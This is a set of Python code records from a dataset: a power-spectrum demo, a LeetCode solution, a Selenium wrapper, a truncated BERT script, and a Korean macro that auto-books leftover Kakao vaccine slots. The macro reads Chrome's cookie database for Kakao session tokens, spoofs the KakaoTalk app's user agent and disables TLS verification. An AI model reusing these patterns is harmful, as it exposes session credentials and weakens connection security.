Hz)')\n    print('')\n    print('Usage:')\n    print('  python powerspectrum.py')\n    print('')\n\n    fundamentals = [300, 450]  # Hz\n    samplerate = 100000.0  # Hz\n    time = np.arange(0.0, 8.0, 1.0/samplerate)\n    data = np.sin(2*np.pi*fundamentals[0]*time) + 0.5*np.sin(2*np.pi*fundamentals[1]*time)\n\n    psd_data = multi_resolution_psd(data, samplerate, fresolution=[0.5, 1])\n\n    fig, ax = plt.subplots()\n    plot_decibel_psd(ax, psd_data[0][1], psd_data[0][0], lw=2)\n    plot_decibel_psd(ax, psd_data[1][1], psd_data[1][0], lw=2)\n    plt.show()\n","sub_path":"powerspectrum.py","file_name":"powerspectrum.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"365205572","text":"#\n# [347] Top K Frequent Elements\n#\n# https://leetcode.com/problems/top-k-frequent-elements/description/\n#\n# algorithms\n# Medium (49.74%)\n# Total Accepted:    105.6K\n# Total Submissions: 212.3K\n# Testcase Example:  '[1,1,1,2,2,3]\\n2'\n#\n#\n# Given a non-empty array of integers, return the k most frequent elements.\n#\n# For example,\n# Given [1,1,1,2,2,3] and k = 2, return [1,2].\n#\n#\n# Note:\n#\n# You may assume k is always valid, 1 ≤ k ≤ number of unique elements.\n# Your algorithm's time complexity must be better than O(n log n), where n is\n# the array's size.\n#\n#\nimport collections\n\n\nclass Solution(object):\n    def topKFrequent(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: List[int]\n        \"\"\"\n        nums_with_count = collections.defaultdict(int)\n        for i in nums:\n            nums_with_count[i] += 1\n        sorted_nums = sorted(nums_with_count, key=nums_with_count.get, reverse=True)\n        return sorted_nums[:k]\n","sub_path":"347.top-k-frequent-elements.150596861.ac.py","file_name":"347.top-k-frequent-elements.150596861.ac.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"630833027","text":"#!/usr/bin/env python3.9 -m nuitka\n# -*- coding: utf-8 -*-\nimport browser_cookie3\nimport requests\nimport configparser\nimport json\nimport os\nimport sys\nimport time\nfrom playsound import playsound\nfrom datetime import datetime\nimport telepot\nimport unicodedata\nimport urllib3\nimport re\nimport platform\n\nsearch_time = 0.2 # interval between searches for leftover vaccines, in seconds\nurllib3.disable_warnings()\n\n# the cookie jar is filled in `load_cookie()` below\njar = None\n\n\n# load the previously entered settings\ndef load_config():\n    config_parser = configparser.ConfigParser()\n    if os.path.exists('config.ini'):\n        try:\n            config_parser.read('config.ini')\n\n            while True:\n                skip_input = str.lower(input(\"기존에 입력한 정보로 재검색하시겠습니까? 
Y/N : \"))\n if skip_input == \"y\":\n skip_input = True\n break\n elif skip_input == \"n\":\n skip_input = False\n break\n else:\n print(\"Y 또는 N을 입력해 주세요.\")\n\n if skip_input:\n # 설정 파일이 있으면 최근 로그인 정보 로딩\n configuration = config_parser['config']\n previous_used_type = configuration[\"VAC\"]\n previous_top_x = configuration[\"topX\"]\n previous_top_y = configuration[\"topY\"]\n previous_bottom_x = configuration[\"botX\"]\n previous_bottom_y = configuration[\"botY\"]\n return previous_used_type, previous_top_x, previous_top_y, previous_bottom_x, previous_bottom_y\n else:\n return None, None, None, None, None\n except ValueError:\n return None, None, None, None, None\n return None, None, None, None, None\n\n\n# cookie.ini 안의 [chrome][cookie_file] 에서 경로를 로드함.\ndef load_cookie_config():\n config_parser = configparser.ConfigParser(interpolation=None)\n if os.path.exists('cookie.ini'):\n try:\n config_parser.read('cookie.ini')\n cookie_file = config_parser['chrome']['cookie_file'].strip()\n\n indicator = cookie_file[0]\n if indicator == '~':\n cookie_path = os.path.expanduser(cookie_file)\n elif indicator in ('%', '$'):\n cookie_path = os.path.expandvars(cookie_file)\n else:\n cookie_path = cookie_file\n\n cookie_path = os.path.abspath(cookie_path)\n\n if os.path.exists(cookie_path):\n return cookie_path\n else:\n print(\"지정된 경로에 쿠키 파일이 존재하지 않습니다. 기본값으로 시도합니다.\")\n return None\n except Exception: # 정확한 오류를 몰라서 전부 Exception\n return None\n return None\n\n\n# cookie 경로가 입력되지 않았을시, 쿠키 파일이 Default 경로에 있는지 확인함\n# 경로가 입력되었거나, Default 경로의 쿠키가 존재해야 global jar 함수에 cookie를 로드함.\ndef load_cookie():\n global jar\n\n cookie_file = load_cookie_config()\n cookie_path = None\n\n os_type = platform.system()\n if os_type == \"Linux\":\n # browser_cookie3 also checks beta version of google chrome's cookie file.\n cookie_path = os.path.expanduser(\n \"~/.config/google-chrome/Default/Cookies\")\n if os.path.exists(cookie_path) is False:\n cookie_path = os.path.expanduser(\n \"~/.config/google-chrome-beta/Default/Cookies\")\n elif os_type == \"Darwin\":\n cookie_path = os.path.expanduser(\n \"~/Library/Application Support/Google/Chrome/Default/Cookies\")\n elif os_type == \"Windows\":\n cookie_path = os.path.expandvars(\n \"%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies\")\n else: # Jython?\n print(\"지원하지 않는 환경입니다.\")\n close()\n\n if cookie_file is None and os.path.exists(cookie_path) is False:\n print(\"기본 쿠키 파일 경로에 파일이 존재하지 않습니다. 아래 링크를 참조하여 쿠키 파일 경로를 지정해주세요.\\n\" +\n \"https://github.com/SJang1/korea-covid-19-remaining-vaccine-macro/discussions/403\")\n close()\n\n jar = browser_cookie3.chrome(\n cookie_file=cookie_file, domain_name=\".kakao.com\")\n\n\ndef check_user_info_loaded():\n user_info_api = 'https://vaccine.kakao.com/api/v1/user'\n user_info_response = requests.get(\n user_info_api, headers=Headers.headers_vacc, cookies=jar, verify=False)\n user_info_json = json.loads(user_info_response.text)\n if user_info_json.get('error'):\n print(\"사용자 정보를 불러오는데 실패하였습니다.\")\n print(\"Chrome 브라우저에서 카카오에 제대로 로그인되어있는지 확인해주세요.\")\n print(\"로그인이 되어 있는데도 안된다면, 카카오톡에 들어가서 잔여백신 알림 신청을 한번 해보세요. 정보제공 동의가 나온다면 동의 후 다시 시도해주세요.\")\n close()\n else:\n user_info = user_info_json.get(\"user\")\n for key in user_info:\n value = user_info[key]\n # print(key, value)\n if key != 'status':\n continue\n if key == 'status' and value == \"NORMAL\":\n print(\"사용자 정보를 불러오는데 성공했습니다.\")\n break\n elif key == 'status' and value == \"UNKNOWN\":\n print(\"상태를 알 수 없는 사용자입니다. 
1339 또는 보건소에 문의해주세요.\")\n close()\n else:\n print(\"이미 접종이 완료되었거나 예약이 완료된 사용자입니다.\")\n close(success=None)\n\n\ndef fill_str_with_space(input_s, max_size=40, fill_char=\" \"):\n \"\"\"\n - 길이가 긴 문자는 2칸으로 체크하고, 짧으면 1칸으로 체크함.\n - 최대 길이(max_size)는 40이며, input_s의 실제 길이가 이보다 짧으면\n 남은 문자를 fill_char로 채운다.\n \"\"\"\n length = 0\n for c in input_s:\n if unicodedata.east_asian_width(c) in [\"F\", \"W\"]:\n length += 2\n else:\n length += 1\n return input_s + fill_char * (max_size - length)\n\n\ndef is_in_range(coord_type, coord, user_min_x=-180.0, user_max_y=90.0):\n korea_coordinate = { # Republic of Korea coordinate\n \"min_x\": 124.5,\n \"max_x\": 132.0,\n \"min_y\": 33.0,\n \"max_y\": 38.9\n }\n try:\n if coord_type == \"x\":\n return max(korea_coordinate[\"min_x\"], user_min_x) <= float(coord) <= korea_coordinate[\"max_x\"]\n elif coord_type == \"y\":\n return korea_coordinate[\"min_y\"] <= float(coord) <= min(korea_coordinate[\"max_y\"], user_max_y)\n else:\n return False\n except ValueError:\n # float 이외 값 입력 방지\n return False\n\n\n# pylint: disable=too-many-branches\ndef input_config():\n vaccine_candidates = [\n {\"name\": \"아무거나\", \"code\": \"ANY\"},\n {\"name\": \"화이자\", \"code\": \"VEN00013\"},\n {\"name\": \"모더나\", \"code\": \"VEN00014\"},\n {\"name\": \"아스트라제네카\", \"code\": \"VEN00015\"},\n {\"name\": \"얀센\", \"code\": \"VEN00016\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00017\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00018\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00019\"},\n {\"name\": \"(미사용)\", \"code\": \"VEN00020\"},\n ]\n vaccine_type = None\n while True:\n print(\"=== 백신 목록 ===\")\n for vaccine in vaccine_candidates:\n if vaccine[\"name\"] == \"(미사용)\":\n continue\n print(\n f\"{fill_str_with_space(vaccine['name'], 10)} : {vaccine['code']}\")\n\n vaccine_type = str.upper(input(\"예약시도할 백신 코드를 알려주세요: \").strip())\n if any(x[\"code\"] == vaccine_type for x in vaccine_candidates) or vaccine_type.startswith(\"FORCE:\"):\n if vaccine_type.startswith(\"FORCE:\"):\n vaccine_type = vaccine_type[6:]\n\n print(\"경고: 강제 코드 입력모드를 사용하셨습니다.\\n\" +\n \"이 모드는 새로운 백신이 예약된 코드로 **등록되지 않은 경우에만** 사용해야 합니다.\\n\" +\n \"입력하신 코드가 정상적으로 작동하는 백신 코드인지 필히 확인해주세요.\\n\" +\n f\"현재 코드: '{vaccine_type}'\\n\")\n\n if (len(vaccine_type) != 8 or not vaccine_type.startswith(\"VEN\") or not vaccine_type[3:].isdigit()):\n print(\"입력하신 코드가 현재 알려진 백신 코드 형식이랑 맞지 않습니다.\")\n proceed = str.lower(input(\"진행하시겠습니까? Y/N : \"))\n if proceed == \"y\":\n pass\n elif proceed == \"n\":\n continue\n else:\n print(\"Y 또는 N을 입력해 주세요.\")\n continue\n\n if next((x for x in vaccine_candidates if x[\"code\"] == vaccine_type), {\"name\": \"\"})[\"name\"] == \"(미사용)\":\n print(\"현재 프로그램 버전에서 백신 이름이 등록되지 않은, 추후를 위해 미리 넣어둔 백신 코드입니다.\\n\" +\n \"입력하신 코드가 정상적으로 작동하는 백신 코드인지 필히 확인해주세요.\\n\" +\n f\"현재 코드: '{vaccine_type}'\\n\")\n\n break\n else:\n print(\"백신 코드를 확인해주세요.\")\n\n print(\"사각형 모양으로 백신범위를 지정한 뒤, 해당 범위 안에 있는 백신을 조회해서 남은 백신이 있으면 Chrome 브라우저를 엽니다.\")\n top_x = None\n while top_x is None:\n top_x = input(\"사각형의 위쪽 좌측 x값을 넣어주세요. 127.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"x\", coord=top_x):\n print(f\"올바른 좌표 값이 아닙니다. 입력 값 : {top_x}\")\n top_x = None\n\n top_y = None\n while top_y is None:\n top_y = input(\"사각형의 위쪽 좌측 y값을 넣어주세요 37.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"y\", coord=top_y):\n print(f\"올바른 좌표 값이 아닙니다. 
입력 값 : {top_y}\")\n top_y = None\n\n bottom_x = None\n while bottom_x is None:\n bottom_x = input(\"사각형의 아래쪽 우측 x값을 넣어주세요 127.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"x\", coord=bottom_x, user_min_x=float(top_x)):\n print(f\"올바른 좌표 값이 아닙니다. 입력 값 : {bottom_x}\")\n bottom_x = None\n\n bottom_y = None\n while bottom_y is None:\n bottom_y = input(\"사각형의 아래쪽 우측 y값을 넣어주세요 37.xxxxxx: \").strip()\n if not is_in_range(coord_type=\"y\", coord=bottom_y, user_max_y=float(top_y)):\n print(f\"올바른 좌표 값이 아닙니다. 입력 값 : {bottom_y}\")\n bottom_y = None\n\n dump_config(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n return vaccine_type, top_x, top_y, bottom_x, bottom_y\n\n\ndef dump_config(vaccine_type, top_x, top_y, bottom_x, bottom_y):\n config_parser = configparser.ConfigParser()\n config_parser['config'] = {}\n conf = config_parser['config']\n conf['VAC'] = vaccine_type\n conf[\"topX\"] = top_x\n conf[\"topY\"] = top_y\n conf[\"botX\"] = bottom_x\n conf[\"botY\"] = bottom_y\n\n with open(\"config.ini\", \"w\") as config_file:\n config_parser.write(config_file)\n\n\ndef clear():\n if 'win' in sys.platform.lower():\n os.system('cls')\n else:\n os.system('clear')\n\n\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(\n os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)\n\n\ndef play_tada():\n playsound(resource_path('tada.mp3'))\n\n\ndef play_xylophon():\n playsound(resource_path('xylophon.mp3'))\n\n\ndef close(success=False):\n if success is True:\n play_tada()\n send_msg(\"잔여백신 예약 성공!! \\n 카카오톡지갑을 확인하세요.\")\n elif success is False:\n play_xylophon()\n send_msg(\"오류와 함께 잔여백신 예약 프로그램이 종료되었습니다.\")\n else:\n pass\n input(\"Press Enter to close...\")\n sys.exit()\n\n\ndef pretty_print(json_object):\n for org in json_object[\"organizations\"]:\n if org.get('status') == \"CLOSED\" or org.get('status') == \"EXHAUSTED\" or org.get('status') == \"UNAVAILABLE\":\n continue\n print(\n f\"잔여갯수: {org.get('leftCounts')}\\t상태: {org.get('status')}\\t기관명: {org.get('orgName')}\\t주소: {org.get('address')}\")\n\n\nclass Headers:\n headers_map = {\n \"Accept\": \"application/json, text/plain, */*\",\n \"Content-Type\": \"application/json;charset=utf-8\",\n \"Origin\": \"https://vaccine-map.kakao.com\",\n \"Accept-Language\": \"en-us\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 KAKAOTALK 9.4.2\",\n \"Referer\": \"https://vaccine-map.kakao.com/\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"Keep-Alive\",\n \"Keep-Alive\": \"timeout=5, max=1000\"\n }\n headers_vacc = {\n \"Accept\": \"application/json, text/plain, */*\",\n \"Content-Type\": \"application/json;charset=utf-8\",\n \"Origin\": \"https://vaccine.kakao.com\",\n \"Accept-Language\": \"en-us\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 KAKAOTALK 9.4.2\",\n \"Referer\": \"https://vaccine.kakao.com/\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"Keep-Alive\",\n \"Keep-Alive\": \"timeout=5, max=1000\"\n }\n\n\ndef try_reservation(organization_code, vaccine_type):\n reservation_url = 'https://vaccine.kakao.com/api/v1/reservation'\n data = {\"from\": \"Map\", \"vaccineCode\": vaccine_type,\n \"orgCode\": organization_code, \"distance\": None}\n response = requests.post(reservation_url, data=json.dumps(\n data), 
headers=Headers.headers_vacc, cookies=jar, verify=False)\n response_json = json.loads(response.text)\n for key in response_json:\n value = response_json[key]\n if key != 'code':\n continue\n if key == 'code' and value == \"NO_VACANCY\":\n print(\"잔여백신 접종 신청이 선착순 마감되었습니다.\")\n time.sleep(0.08)\n elif key == 'code' and value == \"TIMEOUT\":\n print(\"TIMEOUT, 예약을 재시도합니다.\")\n retry_reservation(organization_code, vaccine_type)\n elif key == 'code' and value == \"SUCCESS\":\n print(\"백신접종신청 성공!!!\")\n organization_code_success = response_json.get(\"organization\")\n print(\n f\"병원이름: {organization_code_success.get('orgName')}\\t\" +\n f\"전화번호: {organization_code_success.get('phoneNumber')}\\t\" +\n f\"주소: {organization_code_success.get('address')}\")\n close(success=True)\n else:\n print(\"ERROR. 아래 메시지를 보고, 예약이 신청된 병원 또는 1339에 예약이 되었는지 확인해보세요.\")\n print(response.text)\n close()\n\n\ndef retry_reservation(organization_code, vaccine_type):\n reservation_url = 'https://vaccine.kakao.com/api/v1/reservation/retry'\n\n data = {\"from\": \"Map\", \"vaccineCode\": vaccine_type,\n \"orgCode\": organization_code, \"distance\": None}\n response = requests.post(reservation_url, data=json.dumps(\n data), headers=Headers.headers_vacc, cookies=jar, verify=False)\n response_json = json.loads(response.text)\n for key in response_json:\n value = response_json[key]\n if key != 'code':\n continue\n if key == 'code' and value == \"NO_VACANCY\":\n print(\"잔여백신 접종 신청이 선착순 마감되었습니다.\")\n time.sleep(0.08)\n elif key == 'code' and value == \"SUCCESS\":\n print(\"백신접종신청 성공!!!\")\n organization_code_success = response_json.get(\"organization\")\n print(\n f\"병원이름: {organization_code_success.get('orgName')}\\t\" +\n f\"전화번호: {organization_code_success.get('phoneNumber')}\\t\" +\n f\"주소: {organization_code_success.get('address')}\")\n close(success=True)\n else:\n print(\"ERROR. 
아래 메시지를 보고, 예약이 신청된 병원 또는 1339에 예약이 되었는지 확인해보세요.\")\n            print(response.text)\n            close()\n\n# ===================================== def ===================================== #\n\n\n# Get Cookie\n# driver = selenium.webdriver.Firefox()\n# driver.get(\"https://cs.kakao.com\")\n# pickle.dump( driver.get_cookies() , open(\"cookies.pkl\",\"wb\"))\n# cookies = pickle.load(open(\"cookies.pkl\", \"rb\"))\n# for cookie in cookies:\n#     driver.add_cookie(cookie)\n#     print(cookie)\n\n# pylint: disable=too-many-locals,too-many-statements,too-many-branches\ndef find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y):\n    url = 'https://vaccine-map.kakao.com/api/v2/vaccine/left_count_by_coords'\n    data = {\"bottomRight\": {\"x\": bottom_x, \"y\": bottom_y}, \"onlyLeft\": False, \"order\": \"latitude\",\n            \"topLeft\": {\"x\": top_x, \"y\": top_y}}\n    done = False\n    found = None\n\n    while not done:\n        try:\n            time.sleep(search_time)\n            response = requests.post(url, data=json.dumps(\n                data), headers=Headers.headers_map, verify=False, timeout=5)\n\n            json_data = json.loads(response.text)\n\n            pretty_print(json_data)\n            print(datetime.now())\n\n            for x in json_data.get(\"organizations\"):\n                if x.get('status') == \"AVAILABLE\" or x.get('leftCounts') != 0:\n                    found = x\n                    done = True\n                    break\n\n        except json.decoder.JSONDecodeError as decodeerror:\n            print(\"JSONDecodeError : \", decodeerror)\n            print(\"JSON string : \", response.text)\n            close()\n\n        except requests.exceptions.Timeout as timeouterror:\n            print(\"Timeout Error : \", timeouterror)\n\n        except requests.exceptions.SSLError as sslerror:\n            print(\"SSL Error : \", sslerror)\n            close()\n\n        except requests.exceptions.ConnectionError as connectionerror:\n            print(\"Connection Error : \", connectionerror)\n            # See psf/requests#5430 to know why this is necessary.\n            if not re.search('Read timed out', str(connectionerror), re.IGNORECASE):\n                close()\n\n        except requests.exceptions.HTTPError as httperror:\n            print(\"Http Error : \", httperror)\n            close()\n\n        except requests.exceptions.RequestException as error:\n            print(\"AnyException : \", error)\n            close()\n\n    if found is None:\n        # nothing available in this pass: search again and pass the result up\n        return find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n    print(f\"{found.get('orgName')} 에서 백신을 {found.get('leftCounts')}개 발견했습니다.\")\n    print(f\"주소는 : {found.get('address')} 입니다.\")\n    organization_code = found.get('orgCode')\n\n    # check how many doses this organization actually has left\n    vaccine_found_code = None\n\n    if vaccine_type == \"ANY\": # no specific vaccine was requested\n        check_organization_url = f'https://vaccine.kakao.com/api/v2/org/org_code/{organization_code}'\n        check_organization_response = requests.get(check_organization_url, headers=Headers.headers_vacc, cookies=jar,\n                                                   verify=False)\n        check_organization_data = json.loads(\n            check_organization_response.text).get(\"lefts\")\n        for x in check_organization_data:\n            if x.get('leftCount') != 0:\n                found = x\n                print(f\"{x.get('vaccineName')} 백신을 {x.get('leftCount')}개 발견했습니다.\")\n                vaccine_found_code = x.get('vaccineCode')\n                break\n            else:\n                print(f\"{x.get('vaccineName')} 백신이 없습니다.\")\n\n    else:\n        vaccine_found_code = vaccine_type\n        print(f\"{vaccine_found_code} 으로 예약을 시도합니다.\")\n\n    if vaccine_found_code and try_reservation(organization_code, vaccine_found_code):\n        return None\n    else:\n        return find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n\n\ndef main_function():\n    load_cookie()\n    check_user_info_loaded()\n    previous_used_type, previous_top_x, previous_top_y, previous_bottom_x, previous_bottom_y = load_config()\n    if previous_used_type is None:\n        vaccine_type, top_x, top_y, bottom_x, bottom_y = 
input_config()\n else:\n vaccine_type, top_x, top_y, bottom_x, bottom_y = previous_used_type, previous_top_x, previous_top_y, previous_bottom_x, previous_bottom_y\n find_vaccine(vaccine_type, top_x, top_y, bottom_x, bottom_y)\n close()\n\n\ndef send_msg(msg):\n config_parser = configparser.ConfigParser()\n if os.path.exists('telegram.txt'):\n try:\n config_parser.read('telegram.txt')\n print(\"Telegram으로 결과를 전송합니다.\")\n tgtoken = config_parser[\"telegram\"][\"token\"]\n tgid = config_parser[\"telegram\"][\"chatid\"]\n bot = telepot.Bot(tgtoken)\n bot.sendMessage(tgid, msg)\n return\n except Exception as e:\n print(\"Telegram Error : \", e)\n return\n\n\n# ===================================== run ===================================== #\nif __name__ == '__main__':\n main_function()\n","sub_path":"vaccine-run-kakao.py","file_name":"vaccine-run-kakao.py","file_ext":"py","file_size_in_byte":22077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"451738484","text":"import os\nimport time\nimport random\nimport logging\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\nclass WebService:\n\n\n def __init__(self):\n\n self._logger = logging.getLogger()\n self._driver = None\n\n def _open_firefox(self, startup_homepage='http://www.baidu.com'):\n\n try:\n firefox_profile = webdriver.FirefoxProfile()\n\n # 设置启动页\n firefox_profile.set_preference('browser.startup.homepage', startup_homepage)\n firefox_profile.set_preference('browser.startup.page', '1')\n # 设置不加载图片、通知窗口\n firefox_profile.set_preference('permissions.default.image', 2)\n firefox_profile.set_preference('permissions.default.desktop-notification', 2)\n firefox_profile.set_preference('plugin.state.flash', 0)\n # 设置本地不缓存\n firefox_profile.set_preference('browser.cache.check_doc_frequency', 3)\n firefox_profile.set_preference('browser.cache.disk.enable', False)\n firefox_profile.set_preference('browser.cache.memory.enable', False)\n firefox_options = webdriver.FirefoxOptions()\n # if proxy:\n # firefox_options.add_argument('--proxy-server={}'.format(proxy))\n\n logging.info(\"启动火狐浏览器\")\n if os.name == 'nt':\n\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Firefox(executable_path='./bin/geckodriver.exe',\n firefox_profile=firefox_profile)\n )\n else:\n firefox_options.add_argument('--headless')\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Firefox(executable_path='./bin/geckodriver',\n firefox_profile=firefox_profile,\n options=firefox_options,\n service_log_path=os.path.devnull)\n )\n self._driver.implicitly_wait(30)\n self._logger.info(u\"火狐浏览器启动完成!\")\n time.sleep(random.randint(8, 15))\n return True\n except Exception as msg:\n self._logger.exception(u\"火狐浏览器启动异常,异常信息:{}\".format(msg))\n return False\n\n def _open_chrome(self, startup_homepage='http://www.baidu.com'):\n\n try:\n # 设置无界面模式浏览器启动\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--ignore-certificate-errors') # 忽略https警告\n chrome_options.add_argument('--disable-cache')\n chrome_options.add_argument('--disable-gpu') # 禁用GPU加速\n chrome_options.add_argument('--start-maximized') # 浏览器最大化\n chrome_options.add_argument('--window-size=1280x1024') # 设置浏览器分辨率(窗口大小)\n chrome_options.add_argument('log-level=3') # info(default) = 0 warning = 1 LOG_ERROR = 2 LOG_FATAL = 3\n\n # 
chrome_options.add_argument('--user-agent=\"\"') # 设置请求头的User-Agent\n chrome_options.add_argument('--disable-infobars') # 禁用浏览器正在被自动化程序控制的提示\n chrome_options.add_argument('--incognito') # 隐身模式(无痕模式)\n # chrome_options.add_argument('--hide-scrollbars') # 隐藏滚动条, 应对一些特殊页面\n # chrome_options.add_argument('--disable-popup-blocking') # 禁用javascript\n chrome_options.add_argument('--blink-settings=imagesEnabled=false') # 不加载图片, 提升速度\n chrome_options.add_argument('lang=en')\n # chrome_options.add_argument('--ignore-certificate-errors') # 禁用扩展插件并实现窗口最大化\n chrome_options.add_argument('-–disable-software-rasterizer')\n chrome_options.add_argument('--disable-extensions')\n\n # if proxy:\n #\n # chrome_options.add_argument('--proxy-server=http://{}'.format(proxy))\n logging.info(\"启动谷歌浏览器\")\n\n print(os.name)\n #windows\n if os.name == 'nt':\n\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Chrome(executable_path='/home/xuxin/drivers/bin/chromedriver',\n chrome_options=chrome_options)\n )\n\n else:\n\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n try:\n # self._driver = WebDriverWait(webdriver, 30).until(\n # lambda driver: driver.Chrome(chrome_options=chrome_options,\n # service_log_path=os.path.devnull)\n # )\n self._driver = WebDriverWait(webdriver, 30).until(\n lambda driver: driver.Chrome(executable_path='/home/xuxin/drivers/bin/chromedriver',\n chrome_options=chrome_options,\n service_log_path=os.path.devnull)\n )\n except Exception as e:\n return False\n self._driver.implicitly_wait(15)\n self._logger.info(u\"谷歌浏览器启动完成!\")\n time.sleep(0.5)\n return True\n\n except Exception as msg:\n\n self._logger.exception(u\"谷歌浏览器启动异常,异常信息:{}\".format(msg))\n return False, \"浏览器启动失败{}\".format(msg)\n\n def _open(self, web=\"Chrome\", startup_homepage='http://www.baidu.com'):\n\n if \"Chrome\" == web:\n\n return self._open_chrome(startup_homepage)\n\n elif \"Firefox\" == web:\n\n return self._open_firefox(startup_homepage)\n\n else:\n\n return False, \"浏览器不存在\"\n\n def _close(self, web=\"Chrome\"):\n\n if \"Chrome\" == web:\n\n if isinstance(self._driver, webdriver.Chrome):\n\n self._driver.quit()\n self._driver = None\n\n elif \"Firefox\" == web:\n\n if isinstance(self._driver, webdriver.Firefox):\n self._driver.quit()\n self._driver = None\n\n else:\n\n if hasattr(self._driver, \"quit\"):\n self._driver.quit()\n self._driver = None\n self._logger.info(\"关闭浏览器\")\n\n def get_cookies(self):\n\n if self._driver:\n\n try:\n\n return self._driver.get_cookies()\n\n except:\n\n return {}\n\n else:\n\n return {}\n\n def clear_cookies(self):\n\n \"\"\"\n 清理浏览器Cookies缓存\n :return:\n \"\"\"\n if self._driver:\n\n self._driver.delete_all_cookies()\n\n def refresh(self):\n\n if self._driver:\n\n self._driver.refresh()\n time.sleep(random.randint(3, 5))\n\n def set_firefox_incognito_mode(self):\n\n action_element = WebDriverWait(self._driver, 20).until(lambda driver: driver.find_element_by_xpath(\"//body\"))\n action_element.send_keys(Keys.CONTROL, Keys.SHIFT, 'p')\n\n def record_web_status(self, title, save_path=os.path.join(os.getcwd(), \"records\"), html_enable=False):\n\n if not os.path.exists(save_path):\n\n os.makedirs(save_path)\n self._driver.get_screenshot_as_file(os.path.join(\n save_path,\n 'image_' + title + datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + '.png'\n ))\n\n if html_enable:\n\n with open(os.path.join(\n save_path,\n \"html_\" + title + '_' + 
datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + \".html\"\n ), \"wb\") as _w:\n _w.write(self._driver.page_source)\n\n def open_browser(self, startup_homepage=\"https://twitter.com\"):\n\n \"\"\"\n 启动浏览器\n :param startup_homepage: 启动页面\n :param proxy: 代理\n :return: True, 成功;False, 失败\n \"\"\"\n return self._open(startup_homepage=startup_homepage)\n\n def check_browser(self, current_url=\"https://twitter.com\"):\n\n \"\"\"\n 检测当前页面\n :param current_url:\n :return:\n \"\"\"\n if current_url in self._driver.current_url:\n\n self._logger.info(\"Twitter首页打开成功\")\n return True\n\n return False\n\n def close_browser(self):\n\n self._close()\n\n def find_element_by_xpath(self, xpath, description=\"ELEMENT\", exception=True, timeout=60):\n\n element = None\n try:\n element = WebDriverWait(self._driver, timeout).until(\n lambda driver: driver.find_element_by_xpath(xpath)\n )\n except TimeoutException:\n if exception:\n self._logger.error(\"{}锁定超时\".format(description))\n self.record_web_status(description)\n except Exception as msg:\n self._logger.exception(\"{}锁定异常,异常信息:{}\".format(description, msg))\n self.record_web_status(description)\n finally:\n return element\n\n def find_element_by_xpath_with_click(self, xpath, description=\"BUTTON\"):\n\n try:\n button_element = self.find_element_by_xpath(xpath, description)\n if button_element:\n button_element.click()\n time.sleep(random.randint(2, 3))\n self._logger.info(\"{}按钮点击完成\".format(description))\n return button_element\n else:\n self._logger.error(\"{}按钮点击失败\".format(description))\n return False\n except Exception as msg:\n self._logger.exception(\"{}锁定点击异常,异常信息:{}\".format(description, msg))\n return False\n\n def find_element_by_xpath_with_send_keys(self, xpath, text, description=\"TEXT\"):\n\n try:\n text_element = self.find_element_by_xpath(xpath, description)\n if text_element:\n time.sleep(0.5)\n text_element.send_keys(text)\n time.sleep(random.randint(2, 3))\n self._logger.info(\"{}内容填充完成\".format(description))\n return True\n else:\n self._logger.error(\"{}内容填充失败\".format(description))\n return False\n except Exception as msg:\n self._logger.exception(\"{}内容填充异常,异常信息:{}\".format(description, msg))\n return False\n\n def __del__(self):\n\n pass\n","sub_path":"core/browserdriver/webdriver_bak.py","file_name":"webdriver_bak.py","file_ext":"py","file_size_in_byte":11167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"364332935","text":"import torch\nfrom transformers import *\nimport numpy as np\nfrom utils import *\nfrom utils_model import *\n\nmodel_class = BertModel\ntokenizer_class = BertTokenizer\npretrained_weights = 'bert-base-uncased'\nmodel = model_class.from_pretrained(pretrained_weights)\ntokenizer = tokenizer_class.from_pretrained(pretrained_weights)\n\ndef get_bert_embedding_single(model, tokenizer, input_text):\n input_ids = torch.tensor([tokenizer.encode(input_text)])\n last_hidden_states = model(input_ids)[0].cpu().detach().numpy()\n last_hidden_states = last_hidden_states[:, 0, :]\n last_hidden_states = last_hidden_states.flatten()\n return last_hidden_states\n\ndef get_bert_embedding(model, tokenizer, input_text_list, embedding_size=768):\n 